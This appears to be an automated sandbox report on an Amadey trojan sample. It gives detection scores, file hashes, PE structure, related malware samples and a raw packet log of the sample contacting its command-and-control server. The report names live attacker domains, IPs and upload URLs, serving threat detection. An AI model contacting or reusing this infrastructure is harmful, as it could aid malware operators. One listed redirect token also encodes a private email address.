1o81tDUu5M.exe | 66% | ReversingLabs | Win32.Trojan.Amadey
1o81tDUu5M.exe | 100% | Avira | TR/Crypt.TPM.Gen
1o81tDUu5M.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.twentytk20pn.top | 147.45.113.159 | true | false | | high
httpbin.org | 34.226.108.155 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 | false | | high
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322se | 1o81tDUu5M.exe, 00000000.00000002.1820625051.000000000160E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://html4/loose.dtd | 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | 1o81tDUu5M.exe | false | | high
http://home.twentytk20pn.top/WE | 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://httpbin.org/ipbefore | 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | 1o81tDUu5M.exe, 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | 1o81tDUu5M.exe | false | | high
https://curl.se/docs/http-cookies.html# | 1o81tDUu5M.exe | false | | high
https://curl.se/docs/alt-svc.html | 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322 | 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1718517701.0000000006F8F000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://home.twentytk20pn.top/WEfo | 1o81tDUu5M.exe, 00000000.00000003.1802788486.00000000016A1000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802595901.0000000001691000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802624909.000000000169E000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000003.1802957386.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, 1o81tDUu5M.exe, 00000000.00000002.1820980792.00000000016B1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF | 1o81tDUu5M.exe, 00000000.00000002.1819574715.0000000000DE0000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
34.226.108.155 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
147.45.113.159 | home.twentytk20pn.top | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578916
Start date and time: 2024-12-20 16:36:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 1o81tDUu5M.exe (renamed because the original name is a hash value)
Original Sample Name: 3fbe557c7ec8409f30604b0f5e365f70.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): SIHClient.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:37:57 | API Interceptor | 3x Sleep call for process: 1o81tDUu5M.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
34.226.108.155 | 16ebsersuX.exe | malicious | Cryptbot |
34.226.108.155 | hUhhrsyGtz.exe | malicious | Cryptbot |
34.226.108.155 | pCElIX19tu.exe | malicious | Unknown |
34.226.108.155 | 5Jat5RkD3a.exe | malicious | Unknown |
34.226.108.155 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer |
34.226.108.155 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer |
34.226.108.155 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer |
34.226.108.155 | s3hvuz3XS0.exe | malicious | Cryptbot |
34.226.108.155 | 65AcuGF7W7.exe | malicious | Cryptbot |
34.226.108.155 | UYJ0oreVew.exe | malicious | Unknown |
147.45.113.159 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | twentytk20pn.top/v1/upload.php
147.45.113.159 | file.exe | malicious | LummaC, Amadey, LummaC Stealer | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=2Rb3R6cTcShMDFLr1734664370
147.45.113.159 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | twentytk20pn.top/v1/upload.php
147.45.113.159 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=aMcIUlaEFPceCafP1734635514
147.45.113.159 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig | twentytk20pn.top/v1/upload.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | HZhObFuFNe.exe | malicious | Unknown | 98.85.100.80
httpbin.org | t6VDbnvGeN.exe | malicious | Unknown | 98.85.100.80
httpbin.org | 16ebsersuX.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | hUhhrsyGtz.exe | malicious | Cryptbot | 34.226.108.155
httpbin.org | pCElIX19tu.exe | malicious | Unknown | 34.226.108.155
httpbin.org | CMpuGis28l.exe | malicious | Unknown | 98.85.100.80
httpbin.org | 5Jat5RkD3a.exe | malicious | Unknown | 34.226.108.155
httpbin.org | u57m8aCdwb.exe | malicious | Unknown | 98.85.100.80
httpbin.org | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80
httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 34.226.108.155
home.twentytk20pn.top | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 147.45.113.159
home.twentytk20pn.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 147.45.113.159
home.twentytk20pn.top | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 147.45.113.159
home.twentytk20pn.top | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | 147.45.113.159
home.twentytk20pn.top | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig | 147.45.113.159
home.twentytk20pn.top | SwJD3kiOwV.exe | malicious | Clipboard Hijacker, Cryptbot | 194.87.47.113
home.twentytk20pn.top | 8dw8GAvqmM.exe | malicious | Clipboard Hijacker, Cryptbot | 194.87.47.113
home.twentytk20pn.top | UYJ0oreVew.exe | malicious | Unknown | 194.87.47.113
home.twentytk20pn.top | L1SrJoDQvG.exe | malicious | Unknown | 194.87.47.113
home.twentytk20pn.top | Ry6ot1YULB.exe | malicious | Unknown | 194.87.47.113
Match | Associated Sample Name / URL | Detection | Threat Name | Context
FREE-NET-ASFREEnetEU | Captcha.hta | malicious | LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer | 147.45.44.131
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 147.45.113.159
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer | 147.45.113.159
 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer | 147.45.113.159
 | https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6i | malicious | HTMLPhisher | 147.45.179.98
 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, LummaC Stealer | 147.45.113.159
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig | 147.45.113.159
 | iviewers.dll | malicious | CredGrabber, Meduza Stealer | 147.45.47.15
 | script.ps1 | malicious | CredGrabber, Meduza Stealer | 147.45.47.15
 | script.hta | malicious | CredGrabber, Meduza Stealer | 147.45.47.15
AMAZON-AESUS | nshmpsl.elf | malicious | Mirai | 52.206.106.77
 | DzbIZ1HRMj.zip | malicious | Unknown | 52.0.145.89
 | 16ebsersuX.exe | malicious | Cryptbot | 34.226.108.155
 | hUhhrsyGtz.exe | malicious | Cryptbot | 34.226.108.155
 | pCElIX19tu.exe | malicious | Unknown | 34.226.108.155
 | securedoc_20241220T070409.html | malicious | Unknown | 52.86.107.71
 | 5Jat5RkD3a.exe | malicious | Unknown | 34.226.108.155
 | https://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJyaWFuLmh1dGNoaW5zQHJpdmVycm9jay5jb20iLCJyZXF1ZXN0SWQiOiJhYzIxMDNjZS03NDZkLTRmMTctNjBkYi00MzM5OWU3NzU5NGEiLCJsaW5rIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9pZC91cm46YWFpZDpzYzpWQTZDMjplOTgwMjRmZi03NGRmLTRlNjctYjJkZi0wNWY0NTk4MTc4OWUiLCJsYWJlbCI6IjExIiwibG9jYWxlIjoicHRfQlIifQ.GzFDC4sqpVLEAHwIPLSleF4_d0iUGb4--dg-spPTHWsUGjt086-aN6bs1cEm-BfvTqQu97RqT5NU-RFwvTkvTA | malicious | Unknown | 3.236.206.93
 | arm5.elf | malicious | Mirai | 54.7.169.53
 | arm7.elf | malicious | Mirai | 18.214.183.17
No context
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.984844015632634
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 1o81tDUu5M.exe
File size: 4'456'448 bytes
MD5: 3fbe557c7ec8409f30604b0f5e365f70
SHA1: 00d9f4548c93be387f68c1b7aeedcf4c75873b60
SHA256: f4e7b423983d4606cb9a72876f57c870884b40556ab6ea3da498d69e02acacab
SHA512: 802d3925592429a116f24c5a35723f030ea6fc4924dc201eb69a09bfeda57aac3e0c2246d0e213d131b888515936c31d13c03fd6c32c2d091a3ddc2437c1642d
SSDEEP: 98304:Lcv0DvP7v4m0C6OkeSEj18aRZTZgE5CT+zM:/vjgmj36Ej931guCT
TLSH: C62633DD9D67785DFCFD94BD0A86426931B0B6B796BDCBA080230AB848DF15A30910FD
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@.......................... ........D...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xf5f000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61905f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x618000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb5d2ec | 0x10 | obbejfdq
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb5d29c | 0x18 | obbejfdq
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x617000 | 0x283e00 | 138ecb49ecd53a6c6d3b1a5f824bf440 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x618000 | 0x2b0 | 0x200 | fde9f1a5508e52b0ee75d954523870ab | False | 0.796875 | data | 5.956232138306263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x619000 | 0x1000 | 0x200 | e8fbf92e0939d0cd4935f0fe539e974d | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x61a000 | 0x38b000 | 0x200 | 9ea5ee5b429edd47a3882ac1d99ee14f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
obbejfdq | 0x9a5000 | 0x1b9000 | 0x1b8600 | a39260f0b17a1968282f76e4b3a15d43 | False | 0.9943257921160943 | data | 7.954225116292913 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
msdghfca | 0xb5e000 | 0x1000 | 0x400 | d06fae7119fd628f6285c25f86cd7312 | False | 0.7958984375 | data | 6.164160131862484 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xb5f000 | 0x3000 | 0x2200 | 5f10ea9826adc53c7b54bfc9ca3ff017 | False | 0.06318933823529412 | DOS executable (COM) | 0.7657283604344686 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xb5d2fc | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
                                                            Dec 20, 2024 16:37:57.227957964 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.228058100 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228097916 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.228238106 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228494883 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228506088 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228606939 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.228763103 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229007006 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229017973 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229032993 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229325056 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229332924 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229343891 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229396105 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229418039 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229460955 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229605913 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229615927 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229645014 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229674101 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229748011 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229793072 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.229937077 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.229945898 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.230000019 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.230082989 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.230134010 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.271107912 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.271230936 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.346391916 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.346448898 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.346545935 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.346586943 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.346718073 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.346833944 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.346892118 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.347084999 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347146034 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347389936 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347481012 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347672939 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347714901 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347791910 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.347982883 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.348023891 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.348357916 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.348936081 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.348994017 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349047899 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349093914 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349097013 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349129915 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349165916 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349189043 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349268913 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349315882 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349456072 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349466085 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349476099 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349515915 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349543095 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349687099 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349777937 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349834919 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349844933 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349854946 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.349899054 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349917889 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.349987030 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350023985 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350263119 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350343943 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350441933 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350588083 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350727081 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350737095 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.350820065 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351037979 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351046085 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351054907 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351216078 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351392984 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351401091 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351409912 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351484060 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351492882 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351571083 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351663113 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351710081 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351717949 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.351896048 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352063894 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352072954 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352103949 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352226973 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352236032 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352305889 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352401972 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352411032 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352467060 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352586985 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.352595091 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.390855074 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.447432041 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.447523117 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.447602987 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.448029041 CET4973180192.168.2.4147.45.113.159
                                                            Dec 20, 2024 16:37:57.466567993 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466583967 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466660023 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466670036 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466815948 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466835022 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.466845036 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468106985 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468246937 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468257904 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468266964 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468389988 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468399048 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468409061 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468543053 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468679905 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468689919 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468698978 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468708038 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468848944 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468858004 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468974113 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468983889 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.468992949 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469005108 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469134092 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469145060 CET8049731147.45.113.159192.168.2.4
                                                            Dec 20, 2024 16:37:57.469155073 CET8049731147.45.113.159192.168.2.4
